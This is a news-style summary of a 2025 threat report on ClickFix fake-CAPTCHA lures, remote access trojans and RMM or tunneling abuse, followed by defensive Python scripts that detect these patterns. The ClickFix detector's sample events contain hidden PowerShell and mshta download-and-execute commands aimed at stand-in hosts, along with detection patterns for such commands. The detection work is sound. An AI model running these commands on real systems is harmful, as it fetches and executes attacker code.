From fake CAPTCHAs to RATs: Inside 2025’s cyber deception threat trends
Cybercriminals are getting better at lying. That’s the takeaway from a new LevelBlue report, which outlines how attackers are using social engineering and legitimate tools to quietly move through environments before they’re caught.
Data showing at what stage an incident was detected (Source: LevelBlue)
In that short window, the number of customers affected by security incidents nearly tripled. The rate jumped from 6 percent in late 2024 to 17 percent in early 2025. More than half of those incidents began at the initial access stage. Once attackers were in, they moved quickly. The average time between compromise and lateral movement fell below 60 minutes. In some cases, it took less than 15.
That speed is possible because attackers continue to rely on familiar tools. Remote Desktop Protocol remains the most common method for moving from one system to another. Remote monitoring and management (RMM) software is widely used to keep access active. LevelBlue found many cases where multiple RMM tools were installed on the same host. Tunneling utilities help attackers avoid firewalls and keep their activity hidden. These tactics are not new, but they are being used with greater precision and automation.
“A striking development in the first half of 2025 is how much more sophisticated threat actors have become at deception,” said Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue. “They’re moving beyond traditional BEC schemes and using targeted social engineering to manipulate users into opening the door. Once inside, they’re deploying remote access trojans and quickly covering their tracks, allowing them to move laterally through networks with alarming speed. This isn’t a one-off trend – we fully expect this shift to continue throughout 2026.”
Another trend is the drop in incidents tied to business email compromise. BEC still accounts for the largest share of initial access, at 57 percent, but this is down from 74 percent in the last reporting period. That shift is linked to the sharp rise in fake CAPTCHA scams and help desk impersonation. Social engineering now makes up 39 percent of initial access methods, nearly triple the rate from late 2024.
ClickFix is the campaign most often cited. In these attacks, users are tricked into copying a line of code into the Windows Run box. This is made to look like a routine CAPTCHA or security prompt. But instead of verifying anything, the user is launching a PowerShell command that connects to an external server and downloads malware. The payload is often a Remote Access Trojan such as NetSupport, Quasar, or Lumma Stealer. ClickFix-related activity rose more than 1,400 percent in just six months.
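One way to hunt for the ClickFix pattern described above in process-creation telemetry, as an added example that is not part of the original article or the LevelBlue report: the Run box is hosted by explorer.exe, so a script host spawned from it with download-and-execute flags on the command line is the launch signature to look for. The sample events, host names, field names, regular expressions and scoring threshold below are all constructed for this illustration, not taken from the report.

```python
import re

# Constructed sample records modelled on Windows process-creation telemetry
# (Sysmon Event ID 1 / Security 4688 style fields). These are not real logs.
SAMPLE_EVENTS = [
    {"host": "WS-017", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (iwr http://captcha-check.invalid/v)"'},
    {"host": "WS-017", "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta http://verify-human.invalid/ok.hta"},
    {"host": "WS-022", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
    {"host": "WS-031", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Process"},
]

# Script hosts a user can launch from the Run box.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line indicators (assumed heuristics). Each adds one point.
INDICATORS = {
    "hidden window":      re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded command":    re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download primitive": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                     r"downloadstring|downloadfile|curl|wget)\b", re.I),
    "in-memory exec":     re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote URL":         re.compile(r"https?://", re.I),
    "policy bypass":      re.compile(r"-e(?:xecutionpolicy)?\s+bypass", re.I),
}


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    # Strong signal: a script host whose parent is explorer.exe, which is
    # what a command pasted into the Run box looks like.
    if event["image"].lower() in SCRIPT_HOSTS and event["parent"].lower() == "explorer.exe":
        score += 2
        reasons.append("script host launched from explorer.exe (Run box / shell)")
    for name, pattern in INDICATORS.items():
        if pattern.search(event["cmdline"]):
            score += 1
            reasons.append(name)
    return score, reasons


def find_clickfix(events, threshold=3):
    """Return the events whose score reaches the (assumed) alert threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"host": ev["host"], "score": score,
                         "reasons": reasons, "cmdline": ev["cmdline"]})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(f'{hit["host"]} score={hit["score"]}: {hit["cmdline"]}')
        for reason in hit["reasons"]:
            print("   -", reason)
```

The explorer.exe parent carries extra weight because an administrator's scheduled or console-launched script (the third sample, which uses an execution-policy bypass but runs under cmd.exe) should stay below the threshold, while a hidden-window download-and-execute one-liner launched from the shell clears it comfortably.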
Once attackers get inside, they are relying on a combination of RMM tools and tunneling to maintain access. Tools like Plink and Ngrok are commonly used to create hidden connections. These blend in with normal IT operations, which makes them harder for defenders to spot. Some cases involved two or even three RMM tools installed at once.
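The stacked-RMM and tunneling pattern described above is something a defender can triage from a software inventory, and the report's later recommendation to control tunneling tools comes down to the same allowlist check. The following is an added example, not code from the article or from LevelBlue: it walks a per-host inventory, flags RMM agents that are not on the organization's approved list, flags more than one RMM agent on a single host, and flags the tunneling utilities the report names. The host names, inventory contents, approved list and product name lists are constructed assumptions for this illustration.

```python
# Constructed per-host software/process inventory (not real data).
INVENTORY = {
    "WS-017":   ["Google Chrome", "AnyDesk", "ScreenConnect Client", "plink.exe"],
    "WS-022":   ["Microsoft Office", "TeamViewer"],
    "SRV-DB01": ["SQL Server", "ngrok", "Atera Agent"],
    "WS-031":   ["Microsoft Office", "Google Chrome"],
}

# Assumed organizational policy: the one RMM product IT is allowed to use.
APPROVED_RMM = {"TeamViewer"}

# Lower-case substrings that identify common RMM products (assumed list,
# extend to match your environment). Tuples keep matching order stable.
RMM_TOOLS = ("anydesk", "teamviewer", "screenconnect", "atera",
             "splashtop", "netsupport")

# Tunneling utilities named in the report; add others as needed.
TUNNEL_TOOLS = ("plink", "ngrok")


def classify(name):
    """Return (rmm_token, tunnel_token) for an inventory entry, None if no match."""
    n = name.lower()
    rmm = next((t for t in RMM_TOOLS if t in n), None)
    tun = next((t for t in TUNNEL_TOOLS if t in n), None)
    return rmm, tun


def triage(inventory, approved_rmm):
    """Map host -> list of findings; hosts with nothing to report are omitted."""
    approved = {a.lower() for a in approved_rmm}
    findings = {}
    for host, items in inventory.items():
        rmm_found, issues = [], []
        for item in items:
            rmm, tun = classify(item)
            if rmm:
                rmm_found.append(item)
                if rmm not in approved:
                    issues.append(f"unapproved RMM tool: {item}")
            if tun:
                issues.append(f"tunneling utility: {item}")
        # Two or more RMM agents on one host is the stacking pattern itself,
        # regardless of whether each one is individually approved.
        if len(rmm_found) >= 2:
            issues.append("multiple RMM tools on one host: " + ", ".join(rmm_found))
        if issues:
            findings[host] = issues
    return findings


if __name__ == "__main__":
    for host, issues in triage(INVENTORY, APPROVED_RMM).items():
        print(host)
        for issue in issues:
            print("   -", issue)
```

Because the check is against an explicit allowlist rather than a blocklist alone, a second, unsanctioned RMM agent surfaces even when it is a legitimate commercial product, which is exactly what makes this technique blend in with normal IT operations.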
The malware trends reflect this approach as well. Lumma Stealer was the most frequently seen infostealer in early 2025. It targets Windows systems and collects browser data, credentials, and cryptocurrency wallets. It is often delivered through phishing emails or fake CAPTCHA pages. Remote Access Trojans were also active. These included AsyncRAT, Remcos, and StealC. Each provides the attacker with full remote access and the ability to launch new attacks.
While data theft is on the rise, ransomware and encryption events have gone down. LevelBlue saw a 78 percent drop in ransomware cases and a 94 percent drop in unauthorized access incidents. That doesn’t mean the threat is gone. It likely signals that attackers are getting what they want without triggering alarms.
Defenders should take note. The report urges organizations to focus on user training, especially around social engineering tactics like fake CAPTCHAs. It also recommends tighter control over PowerShell, script execution, and tunneling tools. Segmenting networks, limiting lateral movement, and reviewing endpoint security policies are also key steps.